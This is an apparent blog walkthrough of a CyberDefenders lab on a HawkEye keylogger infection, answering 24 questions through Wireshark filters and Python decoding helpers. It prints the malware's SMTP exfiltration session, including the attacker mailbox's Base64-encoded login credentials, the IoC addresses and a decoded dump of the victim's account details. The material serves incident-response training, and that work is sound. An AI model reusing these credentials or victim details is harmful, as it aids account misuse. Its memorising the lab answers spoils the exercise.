Reconstruct a HawkEye Keylogger data exfiltration incident by analyzing network traffic with Wireshark and CyberChef, identifying IoCs and stolen credentials.


Introduction


Today I’ll be going through the HawkEye lab on CyberDefenders. This is tagged as being a Medium difficulty challenge, so I’m excited to get into this!

Going off the tags for the lab, it looks like we’ll need to use Wireshark, and possibly do some threat intel with VirusTotal.

Before we get started we’ll need to download the lab files. Unzip this and open up stealer.pcap with Wireshark.


An accountant at your organization received an email regarding an invoice with a download link. Suspicious network traffic was observed shortly after opening the email. As a SOC analyst, investigate the network trace and analyze exfiltration attempts.

The scenario introduction for this lab gives us a bit of context for the .pcap that we’ll be looking into. I’ve looked into phishing-focused tasks in the past, but only through the context of checking .eml headers, never through the network view with Wireshark.


Question one

How many packets does the capture have?


This should be fairly easy to answer. Just opening the .pcap in Wireshark gives you the number of packets. No need to write any filters or do anything fancy for this question.


Question two

At what time was the first packet captured (UTC)?


This is another question that we can answer as soon as we open the .pcap! If you’ve configured your Wireshark setup to display the time correctly (In an actual readable format with UTC, as god intended) then you’ll be able to spot this as soon as you see the packets.

To enable this, go to **View > Time Display Format > UTC Year, Day of Year, and Time of Day**. (Screenshot: the View > Time Display Format menu with that option highlighted.)

This will give you the UTC time of all packets. UTC is the standard time reference people use when reporting on incidents, and many SIEM tools also display times in UTC, so it’s best to start using it now!


Question three

What is the duration of the capture?


Another easy one. When I first looked at this lab I was worried by how many questions there were (24 of them!). Now that we’re getting into the swing of things it’s becoming apparent that these questions are fairly easy to answer. At least at the start here.

We can find this answer under Statistics > Capture File Properties, where the Elapsed field is the capture duration. In fact we can get the answer for question two from this screen as well (the First packet field).

The Capture File Properties screen is good to check when you’re first given a .pcap to get a quick overview of the capture file. In fact, we can retrieve the answer for question one here as well, from the Packets count.

The answer is easy to grab here. Hopefully the questions stay being this easy and we’ll be done in no time!


Question four

What is the most active computer at the link level?


This is another answer we can get from the Statistics menu. Under Statistics > Conversations, on the Ethernet tab, sort by the Packets column to see which pair of MAC addresses exchanged the most frames. Thankfully all we need is the Address A MAC address of the top row. If you would rather have per-address totals than pairs, Statistics > Endpoints > Ethernet sorted by Packets gives the same answer more directly.

Make sure that you haven’t ticked ‘Name Resolution’ on the left hand side, or the first three bytes of each MAC address (the OUI) will be replaced with the manufacturer’s name. That is worth noting down, but for this answer we need the raw MAC address.


Question five

Manufacturer of the NIC of the most active system at the link level?


I alluded to this in the last question, but we can now tick the ‘Name Resolution’ option on the left hand side of the Conversations panel. Wireshark looks the OUI up in its bundled manufacturer database and shows an abbreviated vendor name rather than the full company name, so you will need to infer the rest. The answer is one of the most popular hardware manufacturers out there, so you should get it straight away. If you need a hand, search for the start of the resolved name.


Question six

Where is the headquarter of the company that manufactured the NIC of the most active computer at the link level?


We don’t need to use Wireshark for this. Simply search the name of the company and you should quickly see where the manufacturer’s headquarters are located.

The answer is where quite a few big tech companies are based, just in case you needed a hint.


Question seven

The organization works with private addressing and netmask /24. How many computers in the organization are involved in the capture?


Back to Wireshark again! With the Statistics > Conversations window still open (or just open it again) we can go to the IPv4 tab. For questions four and five we used the Ethernet tab for the MAC address; for the subnet we use the IPv4 tab instead.

Sort the ‘Address B’ column and count the distinct private IP addresses in the /24. Two things to watch for: a local host can also turn up in the ‘Address A’ column (it may be Address A in one conversation and Address B in another, so count each address once), and the subnet’s broadcast address (the .255 of a /24) is not a computer, so leave it out.
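The counting is easy to get wrong by hand when a capture has many conversations, so here is a short Python script, added for this write-up and not part of the lab or the original post, that does the same job on a constructed conversation list: it collects every RFC 1918 address seen on either side, groups the addresses by /24, and drops the network and broadcast addresses. Only 10.4.10.132 comes from the capture; every other address in the sample is made up, and the script generalizes the question by reporting every private /24 it sees rather than just one.

```python
import ipaddress
from collections import defaultdict

# "Private addressing" in the question means RFC 1918 space.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in the shape of the Address A / Address B columns of
# Statistics > Conversations > IPv4. Only 10.4.10.132 is from the write-up;
# every other address is made up for this example.
SAMPLE_CONVERSATIONS = [
    ("10.4.10.132", "10.4.10.1"),
    ("10.4.10.132", "203.0.113.10"),   # external web server
    ("10.4.10.132", "198.51.100.7"),   # external mail server
    ("10.4.10.20", "10.4.10.132"),     # a local host that only appears in Address A
    ("10.4.10.132", "10.4.10.255"),    # directed broadcast, not a computer
    ("0.0.0.0", "255.255.255.255"),    # DHCP discover, neither side is a host address
    ("10.4.10.20", "224.0.0.252"),     # LLMNR multicast
    ("10.4.10.1", "10.4.10.20"),
]


def is_rfc1918(ip):
    return any(ip in net for net in RFC1918)


def hosts_per_private_subnet(conversations, prefixlen=24):
    """Group every RFC 1918 address seen on either side of a conversation by its
    /prefixlen subnet, dropping the network and broadcast addresses. Returns
    {"10.4.10.0/24": ["10.4.10.1", ...], ...} with hosts in numeric order."""
    subnets = defaultdict(set)
    for addr_a, addr_b in conversations:
        for addr in (addr_a, addr_b):
            ip = ipaddress.ip_address(addr)
            if not is_rfc1918(ip):
                continue  # public, multicast, 0.0.0.0 and limited broadcast all drop out here
            net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
            if ip in (net.network_address, net.broadcast_address):
                continue  # .0 and .255 of a /24 are never computers
            subnets[net].add(ip)
    return {str(net): [str(ip) for ip in sorted(hosts)] for net, hosts in subnets.items()}


def count_hosts(conversations, subnet, prefixlen=24):
    """Number of distinct hosts seen in one subnet, e.g. "10.4.10.0/24"."""
    return len(hosts_per_private_subnet(conversations, prefixlen).get(subnet, []))


if __name__ == "__main__":
    for net, hosts in hosts_per_private_subnet(SAMPLE_CONVERSATIONS).items():
        print(f"{net}: {len(hosts)} host(s): {', '.join(hosts)}")
```

On the sample this reports three hosts in 10.4.10.0/24, because the broadcast address, the DHCP discover pair and the multicast destination are all filtered out. To run it on a real capture, export Statistics > Conversations > IPv4 as CSV and feed the Address A / Address B columns in as the tuple list.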


Question eight

What is the name of the most active computer at the network level?


The Conversations pane clearly shows that the device with the IP 10.4.10.132 is the most active on the network, but the question wants its name (the hostname the machine registers, i.e. its NetBIOS name), not its address.

We can finally write a Wireshark filter now! Only took us eight questions.

There are a few ways that we can find the hostname that belongs to the IP address. What seems to be the intended method (based on the hints) is using dhcp related filters. Here’s the filter I found that gave me exactly one packet in return: dhcp && ip.src == 10.4.10.132

If you check this packet you’ll see the hostname of the endpoint under the Option: (12) Host Name field.

There are other ways to get hostnames out of a capture: the DHCP host name is its own field, so dhcp.option.hostname on its own lists every DHCP packet that carries one, and Windows hosts also announce their names in NetBIOS Name Service registrations (nbns) and browser protocol host announcements (browser). The DHCP filter gives us the answer here, and that’s all that really matters.


Question nine

What is the IP of the organization’s DNS server?


I got this answer with a very basic dns filter. It’s not elegant, and I wasn’t happy with just applying a filter and guessing, so let’s see how we can improve it.

dns.flags.response is a field in DNS packets that indicates whether the packet is a query or a response. From the scenario text we know the infected IP is a user’s endpoint, not a server, so its DNS queries must be going to the organization’s resolver. We can craft a filter where the source is our infected IP (10.4.10.132) and the DNS packets are queries; dns.flags.response == 0 selects queries. Putting that together we get this filter:

ip.src == 10.4.10.132 && dns && dns.flags.response == 0

This gives us 39 packets, and their destination IP is our answer. For me the destination was already resolved to a hostname/FQDN, but expanding the IP header in the packet details shows the address the question is asking for.


Question ten

What domain is the victim asking about in packet 204?


A quick Ctrl + G for packet 204 will take you directly to that packet. Using the above filter we can already see this packet in case you want to do it the manual way (which you shouldn’t).

Expand the Domain Name System section of the packet and read the Name field under Queries. Pretty simple and easy one.


Question eleven

What is the IP of the domain in the previous question?


There are a few different ways to find this answer. The easiest is to right click on packet 204 and choose Follow > UDP Stream. This shows us packet 206, the DNS response from the server, whose Answers section carries the A record (the dns.a field) with the IP address for the domain. Another very simple one.


Question twelve

Indicate the country to which the IP in the previous section belongs.


I like to use ipinfo.io to get geolocation information on IP addresses. They have an API with a generous amount of daily requests on the free plan that gives you a lot of useful information. Other APIs/TI tools out there will give you the same information, but once you have the correct IP Address you’ll be able to get this question pretty quickly.


Question thirteen

What operating system does the victim’s computer run?


We can analyze the User-Agent sent by the victim (10.4.10.132) to find information like the operating system. I wrote this filter, which returned one packet containing User-Agent information: ip.src == 10.4.10.132 && http.request.method == GET.

This uses the victim IP as the source and specifies GET requests, which usually include a User-Agent header. You’ll find this User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

If you know how to read this, good job, you have the answer. If you don’t, use a User-Agent parser. In an online parser, read the full operating system version value rather than the short one; the two differ slightly and only one gives the answer wanted here.
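Here is a small parser, added for this write-up and not part of the lab or the original post, that decodes the User-Agent above the way an online parser would: it maps the Windows NT kernel token to the release name, reads WOW64 for the architecture, and compares the MSIE token with the Trident engine version, since a Trident version newer than the MSIE number means Internet Explorer is running in Compatibility View. The version tables are the documented Microsoft values; the only input is the User-Agent quoted above.

```python
import re

# Windows NT kernel version token -> Windows release. Client and server editions
# share a kernel version, so the User-Agent alone cannot tell them apart.
WINDOWS_NT_VERSIONS = {
    "5.1": "Windows XP",
    "5.2": "Windows XP x64 / Server 2003",
    "6.0": "Windows Vista / Server 2008",
    "6.1": "Windows 7 / Server 2008 R2",
    "6.2": "Windows 8 / Server 2012",
    "6.3": "Windows 8.1 / Server 2012 R2",
    "10.0": "Windows 10 or later / Server 2016 or later",
}

# Trident (MSHTML) engine version -> the Internet Explorer release that shipped it.
TRIDENT_TO_IE = {"4.0": "8", "5.0": "9", "6.0": "10", "7.0": "11"}

# The User-Agent quoted in the write-up, copied from the capture.
UA_FROM_CAPTURE = (
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)"
)


def parse_ie_user_agent(ua):
    """Return the OS, architecture and real IE version encoded in a Windows IE
    User-Agent, or None if the string carries no 'Windows NT x.y' token."""
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if not nt:
        return None
    msie = re.search(r"MSIE (\d+\.\d+)", ua)
    trident = re.search(r"Trident/(\d+\.\d+)", ua)
    claimed_ie = msie.group(1) if msie else None
    engine_ie = TRIDENT_TO_IE.get(trident.group(1)) if trident else None
    if "WOW64" in ua:
        arch = "64-bit (WOW64)"      # 32-bit browser process on 64-bit Windows
    elif "Win64" in ua:
        arch = "64-bit"
    else:
        arch = "32-bit or unknown"
    return {
        "nt_version": nt.group(1),
        "os": WINDOWS_NT_VERSIONS.get(nt.group(1), f"unknown Windows NT {nt.group(1)}"),
        "arch": arch,
        "ie_claimed": claimed_ie,
        "ie_actual": engine_ie,
        # A Trident engine newer than the MSIE token means Compatibility View is on:
        # IE reports an old MSIE number while running the current engine.
        "compat_view": bool(claimed_ie and engine_ie and float(engine_ie) > float(claimed_ie)),
        "dotnet_clr": sorted(set(re.findall(r"\.NET CLR (\d+\.\d+\.\d+)", ua))),
    }


if __name__ == "__main__":
    for key, value in parse_ie_user_agent(UA_FROM_CAPTURE).items():
        print(f"{key:12}: {value}")
```

One caveat: the User-Agent is whatever the client chose to send, and malware frequently hardcodes one. Treat it as a lead and corroborate the OS with other artifacts in the capture (the DHCP vendor class, SMB dialect negotiation, IP TTL) before it goes into a report.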


Question fourteen

What is the name of the malicious file downloaded by the accountant?


The very same packet that we used to answer question thirteen can be used for this answer too!

The GET request that contains the User-Agent also has a request URI value that reveals the actual resource the GET request was for. The filename alone already seems suspicious. It’s pretty easy to spot, so just look closer at the packet information using the same Wireshark filter that I wrote for the above question.


Question fifteen

What is the md5 hash of the downloaded file?


We can get this suspicious file by exporting it through File > Export Objects > HTTP, then select the filename identified in question fourteen.

Once this malicious file is exported you can use something like md5sum to grab the answer - md5sum ./tkraw_Protected99.exe. Before trusting the hash, check that the exported file’s size matches the Content-Length in the server’s HTTP response: Export Objects writes whatever Wireshark managed to reassemble, and a truncated transfer gives a hash that won’t match anything in VirusTotal.


Question sixteen

What software runs the webserver that hosts the malware?


The IP address of the server that hosted the malware is 217.182.138.150. We can write a filter to find any packets that contain an HTTP reply from this server, which will likely have some information like the software running on it. Here’s the one I wrote: http && ip.src == 217.182.138.150.

This filter will only show one packet. Analyzing it will show you the webserver software under the ‘Server’ header. Bear in mind that the Server header is whatever the server chooses to send, so it is a claim rather than proof.


Question seventeen

What is the public IP of the victim’s computer?


This took me a while to find. I ended up backtracking to one of the previous filters - ip.src == 10.4.10.132 && http.request.method == GET. When we were trying to find the User-Agent in question thirteen I noticed a few requests going to bot.whatismyipaddress.com. If we follow the HTTP Stream you can see the reply from this webpage, which contains nothing but the public IP address of the victim.


Question eighteen

In which country is the email server to which the stolen information is sent?


This question threw me off a little as I’ve never actually investigated emails from the network point of view. I quickly found how easy it was!

Outbound email uses SMTP, and we know that the victim computer (and IP) is the one having data exfiltrated. With these two requirements we can write this filter: ip.src == 10.4.10.132 && smtp. It’s super simple and might not work in a real environment where legitimate emails are sent throughout the day (or even throughout the packet capture), since you would then have to separate the malware’s sessions from normal mail.

The results from this filter show only one destination IP address - 23.229.162.69.

Using ipinfo or any other threat intelligence site will get you the answer for this question once you have found that IP.


Question nineteen

Analyzing the first extraction of information. What software runs the email server to which the stolen data is sent?


The first part of this question made me wonder if I had missed a section. I’m not sure why it’s worded this way, but the answer isn’t too hard once you wrap your head around what it is that the question is asking.

We don’t actually need to write a new filter for this either. Using the same filter (ip.src == 10.4.10.132 && smtp) as in question eighteen we can simply follow the TCP stream of any of the packets and get the following:

220-p3plcpnl0413.prod.phx3.secureserver.net ESMTP #### #### #1 Wed, 10 Apr 2019 13:38:15 -0700 
220-We do not authorize the use of this system to transport unsolicited, 
220 and/or bulk e-mail.

EHLO Beijing-5cd1-PC

250-p3plcpnl0413.prod.phx3.secureserver.net Hello Beijing-5cd1-PC [173.66.146.112]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250-SMTPUTF8
250 HELP

AUTH login c2FsZXMuZGVsQG1hY3dpbmxvZ2lzdGljcy5pbg==

334 UGFzc3dvcmQ6

U2FsZXNAMjM=

235 Authentication succeeded

MAIL FROM:<sales.del@macwinlogistics.in>

250 OK

RCPT TO:<sales.del@macwinlogistics.in>

250 Accepted

DATA

354 Enter message, ending with "." on a line by itself

MIME-Version: 1.0
From: sales.del@macwinlogistics.in
To: sales.del@macwinlogistics.in
Date: 10 Apr 2019 20:38:08 +0000
Subject: =?utf-8?B?SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkgLSBQYXNzd29yZHMgTG9ncyAtIHJvbWFuLm1jZ3VpcmUgXCBCRUlKSU5HLTVDRDEtUEMgLSAxNzMuNjYuMTQ2LjExMg==?=
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64
<base64-encoded message body omitted>
.

250 OK id=1hEJz6-00G6e9-Af
421 p3plcpnl0413.prod.phx3.secureserver.net lost input connection

This conversation has a whole trove of information that we will use to answer future questions, but for now we can focus on the very beginning of the conversation: the 220 greeting banner. I’ve censored the name and version out, but this is the software running the email server on the IP address we identified earlier (23.229.162.69). Notice also that the server advertised STARTTLS in its EHLO response and the client never issued it, going straight to AUTH LOGIN over the plaintext connection. That is the only reason the credentials and the message body are readable in the capture at all.


Question twenty

To which email account is the stolen information sent?


Quick one to answer. We can use the full dump of the conversation from question nineteen to answer this. Check the RCPT TO value.


Question twenty-one

What is the password used by the malware to send the email?


This answer is also visible in the conversation I dumped back in question nineteen, though not in plaintext.

AUTH login c2FsZXMuZGVsQG1hY3dpbmxvZ2lzdGljcy5pbg==

334 UGFzc3dvcmQ6

U2FsZXNAMjM=

235 Authentication succeeded

This section shows a successful auth attempt. AUTH LOGIN works in three Base64-encoded steps: the string on the AUTH login line is the username, the server’s 334 reply (UGFzc3dvcmQ6) is just the prompt ‘Password:’, and the client’s next line (U2FsZXNAMjM=) is the password. Base64 is an encoding, not encryption; it’s a fairly common scheme that you’ll see show up all over the place.

You can use any sort of tool, like base64 -d from the CLI, or CyberChef to decode this Base64 string and get the answer.
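To make the decoding mechanical, here is a Python script, added for this write-up and not taken from the lab or the original post, that pulls the AUTH LOGIN credentials, the RFC 2047 encoded Subject and the Base64 DATA body out of a cleartext SMTP session; it covers this question and the body decode needed in the next one. The session it parses is constructed for the example: the username exfil@test, the password Pa55w0rd!, the subject and the body are made up and are not the capture’s values. Only the 334 UGFzc3dvcmQ6 prompt is the same as in the capture, because every AUTH LOGIN server sends it.

```python
import base64
from email import message_from_bytes
from email.header import decode_header, make_header

# Constructed SMTP session in the shape of the stream shown above. The credentials
# (exfil@test / Pa55w0rd!), subject and body are made up for this example and
# are NOT the capture's values. Only "334 UGFzc3dvcmQ6" is identical to the
# capture, because it is base64("Password:") and every AUTH LOGIN server sends it.
SAMPLE_BODY = (
    "Example Stealer - Passwords Logs\n"
    "URL       : https://login.example.invalid/\n"
    "User Name : alice\n"
    "Password  : hunter2\n"
)
SAMPLE_STREAM = f"""\
220 mail.example.invalid ESMTP
EHLO EXAMPLE-PC
250-mail.example.invalid Hello EXAMPLE-PC [192.0.2.10]
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH login ZXhmaWxAdGVzdA==
334 UGFzc3dvcmQ6
UGE1NXcwcmQh
235 Authentication succeeded
MAIL FROM:<exfil@test>
250 OK
RCPT TO:<exfil@test>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
MIME-Version: 1.0
From: exfil@test
To: exfil@test
Subject: =?utf-8?B?UGFzc3dvcmRzIExvZ3M=?=
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64

{base64.b64encode(SAMPLE_BODY.encode()).decode()}
.
250 OK id=0000
"""


def b64_text(token):
    return base64.b64decode(token).decode("utf-8", errors="replace")


def decode_auth_login(stream):
    """Recover the AUTH LOGIN credentials from a cleartext SMTP session.
    The client sends base64(username), either inline on the AUTH line or after a
    '334 VXNlcm5hbWU6' (Username:) prompt, the server answers '334 UGFzc3dvcmQ6'
    (Password:), and the client sends base64(password). 235 = success, 535 = failure."""
    lines = [line.strip() for line in stream.splitlines()]
    for i, line in enumerate(lines):
        parts = line.split()
        if len(parts) < 2 or parts[0].upper() != "AUTH" or parts[1].upper() != "LOGIN":
            continue
        client_tokens = parts[2:3]          # username, if it was sent inline
        outcome = "unknown"
        for nxt in lines[i + 1:]:
            if nxt[:3].isdigit():           # server reply
                if nxt.startswith("235"):
                    outcome = "succeeded"
                    break
                if nxt.startswith("535"):
                    outcome = "failed"
                    break
                continue                    # 334 prompts carry no client data
            client_tokens.append(nxt)
        if len(client_tokens) >= 2:
            return {"username": b64_text(client_tokens[0]),
                    "password": b64_text(client_tokens[1]),
                    "result": outcome}
    return None


def extract_message(stream):
    """Parse the MIME message between DATA and the lone '.' terminator, decoding
    the RFC 2047 Subject and the base64 Content-Transfer-Encoding of the body."""
    lines = stream.splitlines()
    start = lines.index("DATA") + 2         # skip the DATA command and the 354 reply
    body_lines = []
    for line in lines[start:]:
        if line == ".":
            break
        body_lines.append(line[1:] if line.startswith("..") else line)  # undo dot-stuffing
    msg = message_from_bytes("\r\n".join(body_lines).encode("utf-8"))
    subject = str(make_header(decode_header(msg["Subject"] or "")))
    charset = msg.get_content_charset() or "utf-8"
    body = msg.get_payload(decode=True).decode(charset, errors="replace")
    return {"from": msg["From"], "to": msg["To"], "subject": subject, "body": body}


if __name__ == "__main__":
    print(decode_auth_login(SAMPLE_STREAM))
    message = extract_message(SAMPLE_STREAM)
    print(message["subject"])
    print(message["body"])
```

To use it on the lab, save the Follow > TCP Stream output (ASCII, both directions) to a file and pass its contents to the two functions. The standard library’s email parser handles the encoded-word Subject and the base64 body for you, which is less error prone than copying the blob into base64 -d by hand.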


Question twenty-two

Which malware variant exfiltrated the data?


This is yet another answer that we can find in the Base64 encoded text found in question nineteen. We can pipe the entire string into base64 -d and get the below plaintext:

HawkEye Keylogger - #########
Passwords Logs
roman.mcguire \ BEIJING-5CD1-PC

==================================================
URL               : https://login.aol.com/account/challenge/password
Web Browser       : Internet Explorer 7.0 - 9.0
User Name         : roman.mcguire914@aol.com
Password          : #########
Password Strength : Very Strong
User Name Field   : 
Password Field    : 
Created Time      : 
Modified Time     : 
Filename          : 
==================================================

==================================================
URL               : https://www.bankofamerica.com/
Web Browser       : Chrome
User Name         : #########
Password          : #########
Password Strength : Very Strong
User Name Field   : onlineId1
Password Field    : passcode1
Created Time      : 4/10/2019 2:35:17 AM
Modified Time     : 
Filename          : C:\Users\roman.mcguire\AppData\Local\Google\Chrome\User Data\Default\Login Data
==================================================

==================================================
Name              : Roman McGuire
Application       : MS Outlook 2002/2003/2007/2010
Email             : roman.mcguire@pizzajukebox.com
Server            : pop.pizzajukebox.com
Server Port       : 995
Secured           : No
Type              : POP3
User              : #########
Password          : #########
Profile           : Outlook
Password Strength : Very Strong
SMTP Server       : smtp.pizzajukebox.com
SMTP Server Port  : 587
==================================================

At the very top we can see the variant and version number for this malware. I’ve censored it out, but if you follow along and extract this plaintext you should find it pretty quickly!


Question twenty-three

What are the bankofamerica access credentials? (username:password)


We can answer this with the plaintext from question twenty-two. Just find the credentials (also censored above) under the https://www.bankofamerica.com/ URL.


Question twenty-four

Every how many minutes does the collected data get exfiltrated?


Reusing the filter from before - ip.src == 10.4.10.132 && smtp - gets this answer. Just check the timestamps and calculate the interval. One thing to keep in mind: that filter matches every packet of every SMTP session, so measure between session starts rather than between adjacent packets. Narrowing it to the EHLO command (ip.src == 10.4.10.132 && smtp.req.command == "EHLO") leaves one packet per session, and switching View > Time Display Format to Seconds Since Previous Displayed Packet prints the gap between consecutive sessions directly, which you then convert to minutes. It’s pretty easy to see!


Conclusion


I was daunted by the number of questions at first, but these were all fun to put together and find the answer. It’s only been a week or so of me grinding out Wireshark specific labs, but I already feel much more comfortable writing filters and following along with questions. There will be plenty more coming soon!